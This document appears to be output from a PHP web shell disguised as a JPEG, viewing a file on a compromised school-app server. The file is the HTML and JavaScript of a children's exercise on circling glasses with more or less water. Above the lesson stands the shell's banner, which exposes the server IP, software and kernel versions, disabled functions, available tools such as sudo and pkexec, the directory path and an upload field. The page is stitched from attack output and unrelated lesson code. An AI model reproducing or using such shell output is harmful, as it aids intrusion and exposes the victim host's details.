????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.55 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/OLD/Html/LevelC/Category2/ |
Upload File : |
<!DOCTYPE html>
<html>
<head>
<title>Circle glasses with more water and less water.</title>
<script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
<style type="text/css">
svg
{
position: absolute;
background-color: transparent;
}
</style>
<script>
function page_load()
{
shared_set_debugInfo(Level.C, Category.No2);
shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.C, Category.No2, 12), true, true);
shared_setFooterTable('id_tblFooter', true, true, true, true, true);
setPageImages();
setAllSvgsWidthHeightAndPositionFromTds();
setAllEllipseStyles();
}
function setPageImages()
{
var imagesPath = '../../../img/LevelC/Category2/LevelCCat2Lesson12/';
shared_setImageSource('id_imgGlasses1Set1', imagesPath, 'glassesCat1Set1.png');
shared_setImageSource('id_imgGlasses2Set1', imagesPath, 'glassesCat2Set1.png');
shared_setImageSource('id_imgGlasses3Set1', imagesPath, 'glassesCat3Set1.png');
shared_setImageSource('id_imgGlasses4Set1', imagesPath, 'glassesCat4Set1.png');
shared_setImageSource('id_imgGlasses5Set1', imagesPath, 'glassesCat1Set2.png');
shared_setImageSource('id_imgGlasses6Set1', imagesPath, 'glassesCat2Set2.png');
shared_setImageSource('id_imgGlasses1Set2', imagesPath, 'glassesCat1Set3.png');
shared_setImageSource('id_imgGlasses2Set2', imagesPath, 'glassesCat2Set3.png');
shared_setImageSource('id_imgGlasses3Set2', imagesPath, 'glassesCat3Set3.png');
shared_setImageSource('id_imgGlasses4Set2', imagesPath, 'glassesCat1Set4.png');
shared_setImageSource('id_imgGlasses5Set2', imagesPath, 'glassesCat2Set4.png');
shared_setImageSource('id_imgGlasses6Set2', imagesPath, 'glassesCat3Set4.png');
}
function setAllSvgsWidthHeightAndPositionFromTds()
{
var nTds = 6;
for (var nthSet = 1; nthSet <= 2; nthSet++)
{
for (var nthTd = 1; nthTd <= nTds; nthTd++)
{
shared_svg_setSvgWidthHeightAndPositionFromTd('id_td' + nthTd + 'Set' + nthSet, 'id_svg' + nthTd + 'Set' + nthSet);
}
}
}
function setAllEllipseStyles()
{
var allEllipseIdsArray = getAll2SetsEllipseIdsArray();
for (var indexEllipse = 0; indexEllipse < allEllipseIdsArray.length; indexEllipse++)
{
var id_ellipse = allEllipseIdsArray[indexEllipse];
shared_svg_setEllipseStyle(id_ellipse);
}
}
function getAll2SetsEllipseIdsArray()
{
var allEllipseIdsArray = new Array();
for (var nthEllipse = 1; nthEllipse <= 15; nthEllipse++)
{
allEllipseIdsArray.push('id_ellipse' + nthEllipse + 'Set1');
}
for (var nthEllipse = 1; nthEllipse <= 14; nthEllipse++)
{
allEllipseIdsArray.push('id_ellipse' + nthEllipse + 'Set2');
}
return (allEllipseIdsArray);
}
function ellipse_click(id_ellipse)
{
var set1Group1IdsArray = ['id_ellipse1Set1', 'id_ellipse2Set1'];
var set1Group2IdsArray = ['id_ellipse3Set1', 'id_ellipse4Set1'];
var set1Group3IdsArray = ['id_ellipse5Set1', 'id_ellipse6Set1'];
var set1Group4IdsArray = ['id_ellipse7Set1', 'id_ellipse8Set1'];
var set1Group5IdsArray = ['id_ellipse9Set1', 'id_ellipse10Set1', 'id_ellipse11Set1'];
var set1Group6IdsArray = ['id_ellipse12Set1', 'id_ellipse13Set1', 'id_ellipse14Set1', 'id_ellipse15Set1'];
var set2Group1IdsArray = ['id_ellipse1Set2', 'id_ellipse2Set2'];
var set2Group2IdsArray = ['id_ellipse3Set2', 'id_ellipse4Set2'];
var set2Group3IdsArray = ['id_ellipse5Set2', 'id_ellipse6Set2', 'id_ellipse7Set2', 'id_ellipse8Set2'];
var set2Group4IdsArray = ['id_ellipse9Set2', 'id_ellipse10Set2'];
var set2Group5IdsArray = ['id_ellipse11Set2', 'id_ellipse12Set2'];
var set2Group6IdsArray = ['id_ellipse13Set2', 'id_ellipse14Set2'];
var allGroupsIdsArrayArray = [set1Group1IdsArray, set1Group2IdsArray, set1Group3IdsArray, set1Group4IdsArray, set1Group5IdsArray, set1Group6IdsArray, set2Group1IdsArray, set2Group2IdsArray, set2Group3IdsArray, set2Group4IdsArray, set2Group5IdsArray, set2Group6IdsArray];
shared_svg_showHideEllipsesMultipleFor1Td(id_ellipse, allGroupsIdsArrayArray);
}
function btnValidate_click()
{
var allEllipseIdsArray = getAll2SetsEllipseIdsArray();
var correctEllipseIdsArray = ['id_ellipse1Set1', 'id_ellipse4Set1', 'id_ellipse5Set1', 'id_ellipse8Set1', 'id_ellipse9Set1', 'id_ellipse12Set1', 'id_ellipse2Set2', 'id_ellipse3Set2', 'id_ellipse8Set2', 'id_ellipse9Set2', 'id_ellipse12Set2', 'id_ellipse14Set2'];
var nCorrectEllipses = shared_svg_validateEllipses(allEllipseIdsArray, correctEllipseIdsArray);
if (nCorrectEllipses == 12)
{
shared_show_claps_animation('shared_id_div_claps_image');
}
}
function btnPrevious_click()
{
window.location = 'LevelCCat2Lesson11.html';
}
function btnNext_click()
{
window.location = 'LevelCCat2Lesson13.html';
}
function btnHome_click()
{
shared_btnHomeCategories_click('LevelC');
}
</script>
</head>
<body onLoad="page_load()">
<div id="shared_id_div_claps_image">
</div>
<table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
<tr height="5%">
<td>
<header height="100%">
<div id="id_tblHeader" align="center"></div>
</header>
</td>
</tr>
<tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
<td>
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>
<table width="100%" height="100%" border="0px" cellspacing="0" cellpadding="5">
<tr height="50%">
<td align="center" style="padding-bottom: 0px">
<table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
<tr height="15%">
<td class="shared_style_text1">1. Circle the <span class="shared_style_options_red">glass </span>which holds more water [<span class="shared_style_options_red">Click for circle</span>].
</td>
</tr>
<tr>
<td>
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr height="50%">
<td id="id_td1Set1" width="33%" align="center">
<img id="id_imgGlasses1Set1">
<svg id="id_svg1Set1">
<ellipse id="id_ellipse1Set1" cx="42%" cy="48%" rx="9%" ry="25%"/>
<ellipse id="id_ellipse2Set1" cx="59%" cy="55%" rx="9%" ry="19%"/>
</svg>
</td>
<td id="id_td2Set1" width="33%" align="center">
<img id="id_imgGlasses2Set1">
<svg id="id_svg2Set1">
<ellipse id="id_ellipse3Set1" cx="40%" cy="55%" rx="10%" ry="25%"/>
<ellipse id="id_ellipse4Set1" cx="59%" cy="49%" rx="10%" ry="30%"/>
</svg>
</td>
<td id="id_td3Set1" width="*" align="center">
<img id="id_imgGlasses3Set1">
<svg id="id_svg3Set1">
<ellipse id="id_ellipse5Set1" cx="43%" cy="48%" rx="8%" ry="25%"/>
<ellipse id="id_ellipse6Set1" cx="57%" cy="51%" rx="7%" ry="20%"/>
</svg>
</td>
</tr>
<tr height="*">
<td id="id_td4Set1" width="33%" align="center">
<img id="id_imgGlasses4Set1">
<svg id="id_svg4Set1">
<ellipse id="id_ellipse7Set1" cx="38%" cy="56%" rx="9%" ry="20%"/>
<ellipse id="id_ellipse8Set1" cx="61%" cy="48%" rx="10%" ry="30%"/>
</svg>
</td>
<td id="id_td5Set1" width="33%" align="center">
<img id="id_imgGlasses5Set1">
<svg id="id_svg5Set1">
<ellipse id="id_ellipse9Set1" cx="39%" cy="50%" rx="9%" ry="26%"/>
<ellipse id="id_ellipse10Set1" cx="54%" cy="54%" rx="6%" ry="20%"/>
<ellipse id="id_ellipse11Set1" cx="66%" cy="56%" rx="6%" ry="16%"/>
</svg>
</td>
<td id="id_td6Set1" width="*" align="center">
<img id="id_imgGlasses6Set1">
<svg id="id_svg6Set1">
<ellipse id="id_ellipse12Set1" cx="35%" cy="48%" rx="6%" ry="18%"/>
<ellipse id="id_ellipse13Set1" cx="47%" cy="56%" rx="6%" ry="18%"/>
<ellipse id="id_ellipse14Set1" cx="59%" cy="65%" rx="6%" ry="14%"/>
<ellipse id="id_ellipse15Set1" cx="68%" cy="43%" rx="6%" ry="16%"/>
</svg>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
<tr height="*">
<td align="center">
<table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
<tr height="15%">
<td class="shared_style_text1">2. Circle the <span class="shared_style_options_red">glass </span>which holds less water [<span class="shared_style_options_red">Click for circle</span>].
</td>
</tr>
<tr>
<td>
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr height="50%">
<td id="id_td1Set2" width="33%" align="center">
<img id="id_imgGlasses1Set2">
<svg id="id_svg1Set2">
<ellipse id="id_ellipse1Set2" cx="42%" cy="45%" rx="8%" ry="26%"/>
<ellipse id="id_ellipse2Set2" cx="55%" cy="58%" rx="8%" ry="22%"/>
</svg>
</td>
<td id="id_td2Set2" width="33%" align="center">
<img id="id_imgGlasses2Set2">
<svg id="id_svg2Set2">
<ellipse id="id_ellipse3Set2" cx="35%" cy="55%" rx="7%" ry="19%"/>
<ellipse id="id_ellipse4Set2" cx="56%" cy="48%" rx="13%" ry="30%"/>
</svg>
</td>
<td id="id_td3Set2" width="*" align="center">
<img id="id_imgGlasses3Set2">
<svg id="id_svg3Set2">
<ellipse id="id_ellipse5Set2" cx="33%" cy="48%" rx="7%" ry="20%"/>
<ellipse id="id_ellipse6Set2" cx="46%" cy="48%" rx="6%" ry="18%"/>
<ellipse id="id_ellipse7Set2" cx="57%" cy="52%" rx="6%" ry="17%"/>
<ellipse id="id_ellipse8Set2" cx="68%" cy="54%" rx="6%" ry="15%"/>
</svg>
</td>
</tr>
<tr height="*">
<td id="id_td4Set2" width="33%" align="center">
<img id="id_imgGlasses4Set2">
<svg id="id_svg4Set2">
<ellipse id="id_ellipse9Set2" cx="38%" cy="55%" rx="9%" ry="23%"/>
<ellipse id="id_ellipse10Set2" cx="60%" cy="49%" rx="12%" ry="35%"/>
</svg>
</td>
<td id="id_td5Set2" width="33%" align="center">
<img id="id_imgGlasses5Set2">
<svg id="id_svg5Set2">
<ellipse id="id_ellipse11Set2" cx="39%" cy="48%" rx="11%" ry="35%"/>
<ellipse id="id_ellipse12Set2" cx="60%" cy="53%" rx="11%" ry="28%"/>
</svg>
</td>
<td id="id_td6Set2" width="*" align="center">
<img id="id_imgGlasses6Set2">
<svg id="id_svg6Set2">
<ellipse id="id_ellipse13Set2" cx="40%" cy="49%" rx="10%" ry="27%"/>
<ellipse id="id_ellipse14Set2" cx="60%" cy="54%" rx="10%" ry="24%"/>
</svg>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
<tr height="5%">
<td>
<footer height="100%">
<div id="id_tblFooter" align="center"></div>
</footer>
</td>
</tr>
</table>
</body>
</html>